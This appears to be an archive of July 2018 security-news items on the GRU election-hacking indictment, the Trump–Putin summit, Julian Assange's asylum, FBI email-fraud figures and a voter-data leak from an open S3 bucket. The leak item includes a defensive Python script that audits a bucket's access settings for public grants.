“ECUADOR’S PRESIDENT Lenin Moreno traveled to London on Friday for the ostensible purpose of speaking at the 2018 Global Disabilities Summit (Moreno has been using a wheelchair since being shot in a 1998 robbery attempt). The concealed, actual purpose of the President’s trip is to meet with British officials to finalize an agreement under which Ecuador will withdraw its asylum protection of Julian Assange, in place since 2012, eject him from the Ecuadorian Embassy in London, and then hand over the WikiLeaks founder to British authorities.” wrote Glenn Greenwald on the Intercept.

Glenn Greenwald (@ggreenwald), 20 Jul 2018:

The editor-in-chief of RT says the Ecuadorian government - now highly subservient to the west under @Lenin's government - will withdraw its asylum grant to Julian Assange and hand him over to the UK. People pretending to believe in press freedom will cheer if he's sent to the US: https://twitter.com/M_Simonyan/status/1019958571889577985 …

Glenn Greenwald, 6:05 PM - Jul 20, 2018:

Which is the greater threat to press freedom: (a) sending Julian Assange to the US to be prosecuted by the Sessions DOJ for publishing classified and hacked docs or (b) Donald Trump tweeting mean insults at Chuck Todd and Wolf Blitzer and being rude to Jim Acosta?

Glenn Greenwald, 8:37 PM - Jul 20, 2018, replying to the tweet above:

The above report that UK & Ecuador are preparing to turn Assange over to UK appears to be true. Big question is whether the US will indict him & seek his extradition, the way Sessions & Pompeo vowed they would. Can't wait to see how many fake press freedom defenders support that.

In May 2017, Swedish prosecutors dropped their preliminary investigation into an allegation of rape against Julian Assange, but the WikiLeaks founder fears that he would be extradited to the US, where he is facing federal charges for his role in the Chelsea Manning case.

Three months ago, Ecuador cut off Assange's internet access, mainly to prevent him from expressing support for Catalonia in its independence dispute with the Spanish Government.

According to Ecuador, Assange had violated the agreement to refrain from interfering in other states’ politics.

What are the current charges against Assange in the UK?

The only criminal proceeding against Assange is a pending 2012 arrest warrant for “failure to surrender,” which experts consider a minor bail violation charge.

This charge carries a prison term of three months and a fine, though it is possible that the time Assange has already spent in prison in the UK could be counted against that sentence.

Industry Reactions to U.S. Indicting 12 Russians for DNC Hack
20.7.18 securityweek BigBrothers

The U.S. last week indicted 12 Russian intelligence officers over their alleged role in a hacking operation targeting the Democratic National Committee (DNC) and Hillary Clinton’s 2016 presidential campaign.

The charges, part of special counsel Robert Mueller’s investigation into Russia’s attempt to interfere in the presidential election, were announced just days before President Donald Trump met his Russian counterpart, Vladimir Putin.

Industry professionals have commented on the charges, their impact, the possible threat actors responsible for the operation, and how these types of attacks can be avoided.

And the feedback begins...

John Hultquist, Director of Intelligence Analysis, FireEye:

“While we had already been aware of much of the information covered in the indictment, there were several interesting insights into the organizations that lie behind the intrusion operators we track. In particular, the document indicates that more than one GRU unit was involved in efforts to undermine the elections. The first of these units, Unit 26165, resembles APT28, the operator who we originally suspected of carrying out the DNC incident. The second of these two units, Unit 74455, is implicated in incidents affecting election systems.

We have been actively tracking an actor we believe was tied to those incidents, and have found some connection between those incidents and others, such as efforts to target the 2017 French elections, and disruptive attacks on the 2018 Olympics, as well as other incidents. Ultimately, though much of their activity remains opaque, we believe GRU organizations have been behind many of the most aggressive incidents in recent memory, including the economically devastating NotPetya attacks and attacks on Ukraine’s grid.”

John Gomez, CEO, Sensato:

“When you consider all that is going on and developing with the Russian hackers, it is important to note that we are very much in the embryonic stages of learning what, specifically, occurred. As more and more comes to light, I suspect we will come to appreciate the high level of sophistication that was employed to carry out the attacks. This attack was planned far in advance. It relied upon the coordination of various assets, including the development of fake personas, the recruitment of cybercriminals, monitoring news feeds, and establishing on-the-ground assets that could be plied for information and intelligence. The attackers timed the attacks to shake confidence and cause confusion.

Although the Russian hackers targeted our government, the real lesson here is that this level of sophistication is not isolated to the Russian hackers identified in the U.S Federal indictment. Rather, we are seeing that other criminal organizations, nation states, and even terrorists are employing the same level of sophistication in their operations. This development with Russia simply highlights what many of us have known all along: Attackers, regardless of motivation, have matured their tactics, techniques, and procedures. They’re innovating at a pace that far outstrips the defenses that most organizations have erected. Even basic attacks, such as phishing, are not the same approaches used a few years ago.

We may be appalled, shocked, and even outraged. Yet, maybe the biggest lesson is that despite all efforts, we failed at protecting one of our most treasured assets--the democratic process. What is more appalling is that many will continue to believe that the adversaries our IT organizations faced just a few years ago are the same adversaries our IT organizations face today. Hopefully, what has occurred with Russia will be a wake-up call, not only at the national level, but within our own organizations. If Russia can manipulate an electoral process, what could they and other, highly focused, well-funded cyber attackers do to our economy, our healthcare organizations, and other critical infrastructure systems like transportation or communications?”

Richard Ford, Chief Scientist, Forcepoint:

“We shouldn’t be distracted by talks of how they did this or why but instead – how will the international community respond to these types of asymmetric attacks that impact the very core of our democratic process? While an indictment is a nice gesture, it has little real consequences beyond drawing yet more attention to the issue.

Cybersecurity knows no borders, and so it is relatively easy for a nation state – or even an enthusiastic group of individuals – to launch attacks from the safety of their own country that can be impactful but carry very little personal risk. How we decide to treat these offensive cyber operations is one of the most pressing questions of our time, and those questions cannot be answered by governments alone. Attacks often involve third-party infrastructure, and vulnerabilities in this infrastructure have to be addressed by those in the commercial world.

It’s time for us as an international community to truly come together and determine not only what constitutes acceptable behavior online at the nation state level, but what checks and balances can be meaningfully put in place to those states that refuse to adhere to these agreed upon practices.”

Ross Rustici, Head of Intelligence Research, Cybereason:

"This further confirms the links already exposed from the indictments related to the social media influence campaigns. The concentrated effort of the Russian state to influence the election is undeniable. The most surprising thing about this is not only the relative ease of the intrusions but the widespread campaign perpetrated by the GRU. This only serves to reinforce the dramatic changes that the internet has brought to influence operations around the world. The ease with which intelligence agencies can have a direct influence in the information age is something that they could only dream of during the Cold War."

Kevin Mitnick, Chief Hacking Officer, KnowBe4:

“After reading the Russian indictment I was surprised to see that the Russians use the same exact methods we use to test our clients' security controls. Our security engineers have never failed to get in when we can use social engineering (phishing, etc.) during an assessment.

The biggest takeaway was that spearphishing is *still* the easiest way the bad guys get in. Why the DNC didn't use Multi-Factor Authentication is beyond me. I believe it is the lack of security awareness training that made it easy for the Russians to hack our election.”

Leo Taddeo, CISO, Cyxtera:

“The indictment teaches cyber security professionals several important lessons. Many legacy security solutions, even when used in combination, simply aren’t designed to mitigate the risks presented by today's adversaries.

A user-centric, context-aware model is non-negotiable – Access controls that require only user name and password are effectively useless. Given the seemingly unstoppable effectiveness of spearphishing, enterprises must assume that one or more of their users has had their credentials compromised. An effective security solution must do more than just verify a user name and password. It must be able to tell if the context of a remote connection is suspicious, such as if it originates from an unusual location or time of day, or from a device with no antivirus software installed. It should also be able to ask for additional authentication steps like one-time passwords (OTP), adjust user permissions on the fly and ultimately block access according to the level of risk. To accomplish this, organizations must adopt a user-centric context-aware model that is built on the principle of least privilege.

Authenticate first, connect second – The indictment specifically calls out that the conspirators conducted scanning on the network IP protocols. The fundamental reason for this vulnerability is that TCP/IP – which was originally designed to operate in an environment where the user community knew and trusted each other – is based on implicit trust, with a “connect first, authenticate second” approach. In today’s hyperconnected and highly adversarial threat landscape, this approach puts organizations at risk. Alternate access control technologies, such as Software-Defined Perimeter (SDP), are built on an “authenticate first, connect second” approach that ensures only authorized users can connect to network resources. This reduces the attack surface and significantly improves security. With Software Defined Perimeter, all resources are invisible to the dangerous reconnaissance techniques outlined in the indictment.

Manage the risks of third-party access – The indictment reveals the conspirators hacked into the DNC’s computers through their access to the DCCC network. Then, they installed and managed different types of malware to explore the DNC network and steal documents. This highlights the need for organizations to better manage the risks of third-party access. By using a solution that leverages the Software-Defined Perimeter (SDP) security framework, organizations can ensure that all endpoints attempting to access a given infrastructure are authenticated and authorized prior to accessing any resources on the network. This not only applies the principle of least privilege to the network, it also reduces the attack surface area by hiding network resources from unauthorized or unauthenticated users.”

Robocalling Firm Exposes U.S. Voter Records
20.7.18 securityweek BigBrothers

A publicly accessible Amazon Web Services S3 bucket belonging to a political autodial firm was exposing hundreds of thousands of United States voter records.

Discovered by Kromtech Security's Bob Diachenko, the misconfigured data repository is part of robocalling company Robocent’s cloud storage and has already been indexed by the searchable database GrayhatWarfare, which currently lists over 48,000 open S3 buckets.

Virginia Beach-based political autodial firm claims to have over 10 years of combined autodial experience and to be able to “reach thousands of voters instantly.”

“Our powerful dialer can make thousands of calls a minute, ensuring large calls always meet the deadline,” Robocent notes on its website.

The company’s publicly accessible storage had 2594 listed files, including audio files with pre-recorded political messages for robocalls (*.mp3, *.wav).

More importantly, the Amazon S3 bucket contained a large amount of voter data (in the form of *.csv, *.xls files): full name, suffix, prefix; phone numbers (cell and landlines); address with house, street, city, state, zip, precinct; age and birth year; and gender.

Other voter information found in the cloud storage included affiliation provided by state, or inferred based on voting trends/history; jurisdiction breakdown based on district, zip code, precinct, county, state; and demographics based on ethnicity, language, and education, Diachenko reveals.

Many of the files in the S3 bucket were aggregated from outside data firms such as NationalBuilder.

In addition to making political robocalls starting at 1¢ per dial, Robocent also provides voter data at only 3¢ per record. The company also advertises on its website the data points it collects.

“We provide voter files for every need, whether it be for a new robocall or simply to update records for door knocking. Our simple request process allows users to choose exactly who to target with no minimum order,” Robocent says on its website.

According to Diachenko, the company quickly secured the S3 bucket and files access after being responsibly alerted on the issue.

“We're a small shop (I'm the only developer) so keeping track of everything can be tough,” Diachenko was told.

Over the past several years, there were numerous incidents involving voter databases, including one reported by Diachenko in December last year, where an improperly secured MongoDB database exposed the information of the entire voting population of California: it contained 19,264,123 records.

12 Russian Intel Officers charged of hacking into U.S. Democrats
19.7.18 securityaffairs BigBrothers

The week closes with the indictment of twelve Russian intelligence officers by a US grand jury. The charges were filed just three days before President Donald Trump is scheduled to meet with Vladimir Putin.
Special Counsel Robert Mueller, who in February indicted 13 Russians for a massive operation aimed at influencing the 2016 Presidential election, has now charged 12 Russian intelligence officers working for the GRU with carrying out “large-scale cyber operations” to steal Democratic Party documents and emails.

Deputy Attorney General Rod Rosenstein announced the indictment at a press conference in Washington.

“There’s no allegation in this indictment that any American citizen committed a crime,” said Rosenstein. “The conspirators corresponded with several Americans during the course of the conspiracy through the internet.”

However, “there’s no allegation in this indictment that the Americans knew they were corresponding with Russian intelligence officers.”

During the news conference, the Deputy Attorney General Rod Rosenstein described the technical details of the operations conducted by the units of Russia’s GRU intelligence agency. The cyberspies stole emails from the Democratic National Committee and Hillary Clinton’s campaign, then leaked them in ways meant to influence the perception of Americans about the Presidential election.

Rosenstein also reported a second operation in which the officers targeted election infrastructure and local election officials. Russian intelligence set up servers in the U.S. and Malaysia under fake names to run their operations, paying for them with cryptocurrency that had been “mined” under their direction.

“The fine details of Russian intelligence operations — the names of officers, the buildings where they worked and the computers they used to run phishing operations and make payments — suggest that prosecutors had an inside view aided by their own or another government’s intelligence apparatus.” reads an article published by Bloomberg.

Rosenstein also remarked that “there’s no allegation that the conspiracy changed the vote count or affected any election result.”

Rosenstein also announced that Trump was informed about the indictment before the announcement and that the timing was determined by “the facts, the evidence, and the law.”

The Deputy Attorney General confirmed that 11 of the Russians indicted were charged with “conspiring to hack into computers, steal documents, and release those documents with the intent to interfere in the election.”

“One of those defendants and a 12th Russian are charged with conspiring to infiltrate computers of organizations involved in administering elections,” he added.

“The defendants accessed email accounts of volunteers and employees of a US presidential campaign, including the campaign chairman starting in March of 2016.”

“They also hacked into the computer networks of a congressional campaign committee and a national political committee.”

The Democratic minority in the US Congress is pressing Trump to cancel the meeting with Putin because, they say, he intentionally interfered with the election to help Trump’s presidential campaign.

“These indictments are further proof of what everyone but the president seems to understand: President Putin is an adversary who interfered in our elections to help President Trump win,” Senator Chuck Schumer, the Democratic Senate minority leader said in a statement.

“President Trump should cancel his meeting with Vladimir Putin until Russia takes demonstrable and transparent steps to prove that they won’t interfere in future elections.”

Speaking on Friday, before the indictments were announced, Trump explained that he would ask Putin about the alleged interference of Russian intelligence in the Presidential election.

“I will absolutely, firmly ask the question, and hopefully we’ll have a good relationship with Russia,” Trump told a joint press conference with British Prime Minister Theresa May.

Trump described the Mueller investigation as a “rigged witch hunt,” and added that he has been “tougher on Russia than anybody.”

“We have been extremely tough on Russia.”

The White House, 10:03 PM - Jul 13, 2018:

At a press conference with U.K. Prime Minister @theresa_may, President @realDonaldTrump made it clear: "We have been far tougher on Russia than anybody."

Trump evidently believes that hostility towards Russia severely damages the relationship and collaboration between the two states.

Russia denies any involvement in the elections, and the Kremlin expelled 60 intelligence officers from the Russian embassy in Washington in response to a nerve agent attack on a former Russian spy in Britain.

No Americans were charged Friday, but the indictment reports unidentified Americans were in contact with the Russian intelligence officers.

According to the indictment, at least one person close to the Trump campaign and a candidate for Congress were in contact with the Russian officers.

FBI: Overall BEC/EAC losses between Oct 2013 and May 2018 amount to $12 billion
19.7.18 securityaffairs BigBrothers

The number of business email compromise (BEC) and email account compromise (EAC) scam incidents worldwide reached 78,000 between October 2013 and May 2018.
The FBI has released further data on Email Account Compromise: according to the feds, the number of business email compromise (BEC) and email account compromise (EAC) scam incidents worldwide reached 78,000 between October 2013 and May 2018.

“Business E-mail Compromise (BEC)/E-mail Account Compromise (EAC) is a sophisticated scam targeting both businesses and individuals performing wire transfer payments.” reads the announcement published by the FBI.

“The scam is frequently carried out when a subject compromises legitimate business e-mail accounts through social engineering or computer intrusion techniques to conduct unauthorized transfers of funds.”

The number of BEC/EAC scams continues to grow and the techniques adopted by scammers are evolving, targeting small, medium, and large business and personal transactions.

Unfortunately, business email compromise (BEC) and email account compromise (EAC) scam losses worldwide increased by 136% from December 2016 to May 2018.
Overall losses between October 2013 and May 2018 amount to $12 billion.

According to the FBI, the number of scam incidents in the US was 41,058, resulting in $2.9 billion in losses. The feds highlighted that most of the fraudulent funds were sent to banks in China and Hong Kong.

The authorities observed that banks in the United Kingdom, Mexico, and Turkey have also been identified recently as prominent destinations for fraudulent funds.

“The scam may not always be associated with a request for transfer of funds. A variation of the scam involves compromising legitimate business e-mail accounts and requesting Personally Identifiable Information (PII) or Wage and Tax Statement (W-2) forms for employees,” reads the announcement published by the FBI.

Scammers appear very focused on organizations in the real estate industry: from 2015 to 2017, the number of BEC/EAC victims in that sector increased by 1,100%.

“Victims most often report a spoofed e-mail being sent or received on behalf of one of these real estate transaction participants with instructions directing the recipient to change the payment type and/or payment location to a fraudulent account. The funds are usually directed to a fraudulent domestic account which quickly disperse through cash or check withdrawals.” continues the announcement.

“The funds may also be transferred to a secondary fraudulent domestic or international account. Funds sent to domestic accounts are often depleted rapidly making recovery difficult.”

Below are the BEC/EAC statistics shared by the FBI:

Domestic and international incidents: 78,617
Domestic and international exposed dollar loss: $12,536,948,299

The following BEC/EAC statistics were reported in victim complaints where a country was identified to the IC3 from October 2013 to May 2018:

Total U.S. victims: 41,058
Total U.S. exposed dollar loss: $2,935,161,457
Total non-U.S. victims: 2,565
Total non-U.S. exposed dollar loss: $671,915,009

The following BEC/EAC statistics were reported by victims via the financial transaction component of the IC3 complaint form, which became available in June 2016. The following statistics were reported in victim complaints to the IC3 from June 2016 to May 2018:

Total U.S. financial recipients: 19,335
Total U.S. financial recipients exposed dollar loss: $1,629,975,562
Total non-U.S. financial recipients: 11,452
Total non-U.S. financial recipients exposed dollar loss: $1,690,788,278
According to a report published by Trend Micro in January 2018, the damage caused by Business Email Compromise (BEC) attacks had surpassed that of past years, and it is estimated that it could reach $9 billion in 2018.

Trump might ask Putin to extradite the 12 Russian intelligence officers
19.7.18 securityaffairs BigBrothers

A few hours before his meeting with Vladimir Putin, US President Donald Trump said he might ask for the extradition to the US of the 12 Russian intelligence officers accused of involvement in attacks on the 2016 presidential election.
Ahead of the Trump-Putin meeting in Helsinki on Monday, the US President said he might ask for the extradition of the 12 Russian intelligence officers accused of attempting to interfere with the 2016 presidential election.

Trump will meet Putin in Finland despite calls from Democratic lawmakers to cancel the summit in light of the indictments.

Journalists asked Trump whether he would request the extradition to the US of the Russian intelligence officers accused of hacking Hillary Clinton’s presidential campaign, and his reply was clear:

“Well, I might,” Trump said.

“I hadn’t thought of that. But I certainly, I’ll be asking about it, but again, this was during the Obama administration. They were doing whatever it was during the Obama administration.”

Trump confirmed that Russian hackers targeted the 2016 presidential election but denied that they supported his campaign, adding that his Republican Party had also been hit by Russian hackers.

“I think the DNC (Democratic National Committee) should be ashamed of themselves for allowing themselves to be hacked,” he said. “They had bad defenses and they were able to be hacked. But I heard they were trying to hack the Republicans too. But — and this may be wrong — but they had much stronger defenses.”

The President blamed the DNC for the poor security of its systems.

“The President then placed blame on Democrats for “allowing” the data and security breaches that led to Russia’s tampering in the election, saying the Democratic National Committee was ill-equipped to handle a cyberattack from a foreign actor. The Republican National Committee, on the other hand, had “much better defenses,” Trump claimed.” CNN reported.
“They were doing whatever it was during the Obama administration,” Trump said of the Russians. “And I heard that they were trying, or people were trying, to hack into the RNC too, the Republican National Committee, but we had much better defenses. I’ve been told that by a number of people, we had much better defenses so they couldn’t. I think the DNC should be ashamed of themselves for allowing themselves to be hacked. They had bad defenses, and they were able to be hacked, but I heard they were trying to hack the Republicans too, but, and this may be wrong, but they had much stronger defenses.”

The attempted hacking of “old emails” of the Republican National Committee was first reported by CNN in January of last year, quoting then-FBI Director James Comey.

Comey told a Senate panel that “old emails” of the Republican National Committee had been targeted, but the material was never publicly released. He confirmed that there was no evidence the current RNC or the Trump campaign had been successfully hacked.

Trump said he was going into the meeting with “low expectations.”

“I’m not going with high expectations,” he added.

“I think it’s a good thing to meet,” he said. “I believe that having a meeting with Chairman Kim was a good thing. I think having meetings with the president of China was a very good thing.”

“I believe it’s really good. So having meetings with Russia, China, North Korea, I believe in it. Nothing bad is going to come out of it, and maybe some good will come out.”

Director of National Intelligence warns of devastating cyber threat to US infrastructure
19.7.18 securityaffairs BigBrothers

Director of National Intelligence Dan Coats warned last week of a devastating cyber threat to US infrastructure, saying that “warning lights are blinking red again.”
The Director of National Intelligence, Dan Coats, warned last week of a devastating cyber threat to US infrastructure, expressing his concern in the following words:

“warning lights are blinking red again”

The U.S. intelligence chief highlighted that the computer networks of US government agencies, enterprises, and academic institutions are under incessant attack from foreign states.

Russia, North Korea, China, and Iran are the most persistent attackers; the number of their attacks continues to increase, and so does their level of sophistication.


The Director of National Intelligence believes that Russia is the most aggressive threat actor, and recent events demonstrate it. On Friday, Special Counsel Robert Mueller, who in February had indicted 13 Russians for a massive operation aimed at influencing the 2016 presidential election, charged 12 Russian intelligence officers of the GRU with carrying out “large-scale cyber operations” to steal Democratic Party documents and emails.

Of the four, “Russia has been the most aggressive foreign actor, no question,” he said.

There is a great difference between the campaigns launched by China and those launched by Russia.

According to Coats, China operates with the primary intent of stealing military and industrial secrets and has “capabilities, resources that perhaps Russia doesn’t have,” while the Kremlin operates to undermine U.S. values and democratic institutions.

Coats spoke at the Hudson Institute think tank shortly after the announcement of the indictment.

Coats warned that the threat of a “crippling cyber attack on our critical infrastructure” by a nation-state actor is growing.

“Coats said the U.S. government has not yet detected the kinds of cyber attacks and intrusions that officials say Russia launched against state election boards and voter data bases before the 2016 election.” Reuters reported.

“However, we fully realize that we are just one click away of the keyboard from a similar situation repeating itself,” Coats continued.

He drew a parallel between the current situation in cyberspace and the “alarming activities” that U.S. intelligence detected before al Qaeda carried out the Sept. 11, 2001 attacks.

“The system was blinking red. Here we are nearly two decades later and I’m here to say the warning lights are blinking red again,” he said.

As I write this, President Donald Trump has arrived at Finland’s Presidential Palace for a summit with Russian President Vladimir Putin.

Ahead of the Trump-Putin meeting in Helsinki on Monday, the US President said he might ask for the extradition of the 12 Russian intelligence officers accused of attempting to interfere with the 2016 presidential election.

Journalists asked Trump whether he would request the extradition to the US of the Russian intelligence officers accused of hacking Hillary Clinton’s presidential campaign, and his reply was clear:

“Well, I might,” Trump said.

“I hadn’t thought of that. But I certainly, I’ll be asking about it, but again, this was during the Obama administration. They were doing whatever it was during the Obama administration.”

Coats also mentioned the so-called “troll factory” operated by unnamed “individuals” affiliated with the St. Petersburg-based Internet Research Agency, which was indicted by federal authorities in February.

These individuals have been “creating new social media accounts, masquerading as Americans and then using these accounts to draw attention to divisive issues,” he said.

Trump – Putin meeting: “I don’t see any reason” for Russia to interfere with the US presidential election
19.7.18 securityaffairs BigBrothers

Russian President Vladimir Putin ‘just said it’s not Russia,’ and President Trump believes him.
Today the controversial meeting between Russian President Vladimir Putin and US President Donald Trump was held in Helsinki, and, as expected, the Russian President denied any interference in the 2016 US election.
After the meeting, Putin and Trump held a joint news conference, at which the US President confirmed his trust in Putin’s words.

“So I have great confidence in my intelligence people, but I will tell you that President Putin was extremely strong and powerful in his denial today,” Trump said.

Special Counsel Robert Mueller has a different view of Russia’s alleged interference in the 2016 presidential election: his investigation led to the indictment of 12 Russian intelligence officers of the GRU for carrying out “large-scale cyber operations” to steal Democratic Party documents and emails.

“I don’t see any reason” for Russia to have interfered in the US presidential election, Trump said.

On Friday, Director of National Intelligence Daniel R. Coats warned of a devastating cyber threat to US infrastructure, saying that “warning lights are blinking red again.”

The Director of National Intelligence believes that Russia is the most aggressive threat actor and recent events demonstrate it.

“Russia has been the most aggressive foreign actor, no question,” he said.

There is a great difference between the campaigns launched by China and those launched by Russia.

According to Coats, China operates with the primary intent of stealing military and industrial secrets and has “capabilities, resources that perhaps Russia doesn’t have,” while the Kremlin operates to undermine U.S. values and democratic institutions.

“The role of the Intelligence Community is to provide the best information and fact-based assessments possible for the President and policymakers. We have been clear in our assessments of Russian meddling in the 2016 election and their ongoing, pervasive efforts to undermine our democracy, and we will continue to provide unvarnished and objective intelligence in support of our national security,” said Coats in a press statement released after the Trump-Putin press event.

HELSINKI, FINLAND – JULY 16: U.S. President Donald Trump (L) and Russian President Vladimir Putin answer questions about the 2016 U.S Election collusion during a joint press conference after their summit on July 16, 2018 in Helsinki, Finland. The two leaders met one-on-one and discussed a range of issues including the 2016 U.S Election collusion. (Photo by Chris McGrath/Getty Images)

Below is an excerpt from the full transcript of the Helsinki press conference concerning the alleged interference in the 2016 presidential election.

“Once again, President Trump mentioned issue of so-called interference of Russia with the American elections. I had to reiterate things I said several times, including during our personal contacts, that the Russian state has never interfered and is not going to interfere in internal American affairs, including election process. Any specific material, if such things arise, we are ready to analyze together. For instance, we can analyze them through the joint working group on cyber security, the establishment of which we discussed during our previous contacts.” said Putin.

“During today’s meeting, I addressed directly with President Putin the issue of Russian interference in our elections. I felt this was a message best delivered in person. Spent a great deal of time talking about it. And President Putin may very well want to address it and very strongly, because he feels strongly about it and he has an interesting idea. We also discussed one of the most critical challenges facing humanity, nuclear proliferation. I provided an update on my meeting last month with Chairman Kim on the denuclearization of North Korea. After today, I am very sure that President Putin and Russia want very much to end that problem. Going to work with us, and I appreciate that commitment.” said Trump.

Expert discovered RoboCent AWS S3 bucket containing US voters’ records exposed online
19.7.18 securityaffairs BigBrothers

A security researcher has discovered that the US political robocall firm RoboCent exposed the personal details of hundreds of thousands of US voters.
The US political robocall firm RoboCent exposed the personal details of hundreds of thousands of US voters in a publicly accessible Amazon S3 bucket.

The researcher Bob Diachenko of Kromtech Security discovered the company’s database exposed online. He was using GrayhatWarfare, an online service that indexes publicly exposed Amazon Web Services S3 storage buckets and lets anyone search their contents by keyword.

The company sells voter records for 3¢ per record; the same data was left exposed online.

Querying the service for the term “voters,” he found the AWS bucket used by RoboCent.

The bucket discovered by the expert contained 2,584 files. The exposed voter data includes:

Full Name, suffix, prefix
Phone numbers (cell and landlines)
Address with house, street, city, state, zip, precinct
Political affiliation provided by state, or inferred based on voting trends/history
Age and birth year
Jurisdiction breakdown based on district, zip code, precinct, county, state
Demographics based on ethnicity, language, education

The server also contained audio files with prerecorded political messages used for the robo-calling service.

“Just when I thought the days of misconfigured AWS S3 buckets are over, I discovered a massive US voter data online, apparently being part of Robocent, Virginia Beach-based political autodial firm’s cloud storage.” wrote Diachenko.

“Many of the files did not originate at Robocent, but are instead the aggregate of outside data firms such as NationalBuilder.”

Diachenko responsibly disclosed the discovery to the company, which quickly secured the bucket. Below is the message sent by the company developer who fixed the issue:

“We’re a small shop (I’m the only developer) so keeping track of everything can be tough”

This isn’t the first case of an unsecured Amazon S3 bucket exposed online: in June 2017, the data firm Deep Root Analytics (DRA) left 1.1 TB of data unsecured on Amazon S3, exposing 198 million US voter records.

In December 2017, Diachenko discovered an exposed MongoDB database containing voter registration data for more than 19 million California residents.
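The check a practitioner would run on their own buckets after a disclosure like this, as an added example rather than code from RoboCent, Kromtech or GrayhatWarfare: audit a bucket’s ACL, bucket policy and Public Access Block settings for anything that makes the bucket listable or readable by the whole internet, which is what lets an open-bucket search engine index it. The ACL, policy and settings below are constructed samples in the shape that boto3’s get_bucket_acl(), get_bucket_policy() and get_public_access_block() return; the audit functions take those documents as plain dicts and strings, so nothing here calls AWS. The bucket name example-voter-data, the canonical IDs and the IAM role ARN are placeholders.

```python
"""Offline audit of S3 bucket access settings for world-readable grants.

Added example, not code from RoboCent, Kromtech or GrayhatWarfare. The sample
documents are constructed in the shape returned by boto3's get_bucket_acl(),
get_bucket_policy() and get_public_access_block(); nothing here calls AWS.
"""
import json

# Pre-defined S3 groups (AWS canonical group URIs) whose grants are public.
PUBLIC_GROUP_URIS = {
    "http://acs.amazonaws.com/groups/global/AllUsers": "anyone, unauthenticated",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers": "any AWS account",
}
# Policy actions that let a principal enumerate or fetch objects.
LIST_OR_READ_ACTIONS = {"s3:ListBucket", "s3:GetObject", "s3:Get*", "s3:List*", "s3:*", "*"}
# All four must be True for the Public Access Block to fully protect a bucket.
PUBLIC_ACCESS_BLOCK_KEYS = (
    "BlockPublicAcls", "IgnorePublicAcls", "BlockPublicPolicy", "RestrictPublicBuckets",
)


def _as_list(value):
    """IAM policy fields may be a scalar or a list; normalise to a list."""
    return value if isinstance(value, list) else [value]


def public_acl_grants(acl):
    """Return (who, permission) for every ACL grant made to a public group.

    On a bucket ACL, READ means 'list the bucket', which is exactly what lets
    an open-bucket search engine enumerate every file in it.
    """
    findings = []
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        uri = grantee.get("URI")
        if grantee.get("Type") == "Group" and uri in PUBLIC_GROUP_URIS:
            findings.append((PUBLIC_GROUP_URIS[uri], grant.get("Permission")))
    return findings


def _principal_is_anyone(principal):
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return "*" in _as_list(principal.get("AWS", []))
    return False


def public_policy_statements(policy_json):
    """Return (Sid, risky actions, has_condition) for Allow statements open to Principal '*'.

    has_condition is reported, not used to suppress the finding: a Condition such as
    aws:SourceVpce or aws:SourceIp may narrow the grant, but that needs a human look.
    """
    policy = json.loads(policy_json)
    findings = []
    for index, stmt in enumerate(_as_list(policy.get("Statement", []))):
        if stmt.get("Effect") != "Allow" or not _principal_is_anyone(stmt.get("Principal")):
            continue
        risky = sorted(set(_as_list(stmt.get("Action", []))) & LIST_OR_READ_ACTIONS)
        if risky:
            findings.append((stmt.get("Sid", f"statement[{index}]"), risky, "Condition" in stmt))
    return findings


def missing_public_access_block(config):
    """Return the Public Access Block settings that are absent or False."""
    return [key for key in PUBLIC_ACCESS_BLOCK_KEYS if not config.get(key, False)]


def audit_bucket(acl, policy_json, public_access_block):
    """Run the three checks; empty lists everywhere mean no public grant was found."""
    return {
        "public_acl_grants": public_acl_grants(acl),
        "public_policy_statements": public_policy_statements(policy_json),
        "missing_public_access_block": missing_public_access_block(public_access_block),
    }


# --- constructed samples (placeholder IDs and bucket name, not real RoboCent data) ---
SAMPLE_ACL = {
    "Owner": {"ID": "0123456789abcdef-placeholder-canonical-id"},
    "Grants": [
        {"Grantee": {"Type": "CanonicalUser", "ID": "0123456789abcdef-placeholder-canonical-id"},
         "Permission": "FULL_CONTROL"},
        # This single grant makes the bucket listable by the whole internet.
        {"Grantee": {"Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AllUsers"},
         "Permission": "READ"},
    ],
}
SAMPLE_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
         "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-voter-data/*"},
        {"Sid": "VpcOnly", "Effect": "Allow", "Principal": {"AWS": "*"},
         "Action": ["s3:GetObject", "s3:ListBucket"],
         "Resource": ["arn:aws:s3:::example-voter-data", "arn:aws:s3:::example-voter-data/*"],
         "Condition": {"StringEquals": {"aws:SourceVpce": "vpce-placeholder"}}},
        {"Sid": "OwnerWrite", "Effect": "Allow",
         "Principal": {"AWS": "arn:aws:iam::123456789012:role/placeholder-uploader"},
         "Action": "s3:PutObject", "Resource": "arn:aws:s3:::example-voter-data/*"},
    ],
})
SAMPLE_PUBLIC_ACCESS_BLOCK = {"BlockPublicAcls": True}  # three of the four settings are missing

if __name__ == "__main__":
    print(json.dumps(audit_bucket(SAMPLE_ACL, SAMPLE_POLICY, SAMPLE_PUBLIC_ACCESS_BLOCK), indent=2))
```

The ACL check is the one that matters for the story above: a READ grant to AllUsers on the bucket itself is what makes the listing public, independent of any object-level ACL. The policy check deliberately reports conditional statements rather than discarding them, and the Public Access Block check is the control that would have made both of the other misconfigurations harmless.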

Russia Targeted by Almost 25 Million Cyber-Attacks During World Cup: Putin
19.7.18 securityweek BigBrothers

Russia was the target of almost 25 million cyber-attacks during the World Cup, President Vladimir Putin said, though he did not indicate who may have been behind the attacks.

"During the period of the World Cup, almost 25 million cyber-attacks and other criminal acts on the information structures in Russia, linked in one way or another to the World Cup, were neutralised," Putin said during a meeting on Sunday with security services.

The president, whose comments were reported by the Kremlin on Monday, gave no information on the nature or possible origins of the cyber-attacks.

"Behind this (World Cup) success lies huge preparatory, operational, analytical and information work, we operated at maximum capacity and concentration," said Putin.

Russia, which hosted the World Cup from June 14 to July 15 in 11 cities and 12 stadiums, has been repeatedly accused by Western countries of conducting cyber-attacks.

On Friday, 12 Russian military intelligence officers were charged with hacking Hillary Clinton's 2016 presidential campaign and the Democratic Party in a stunning indictment three days before President Donald Trump meets with Putin in Helsinki on Monday.

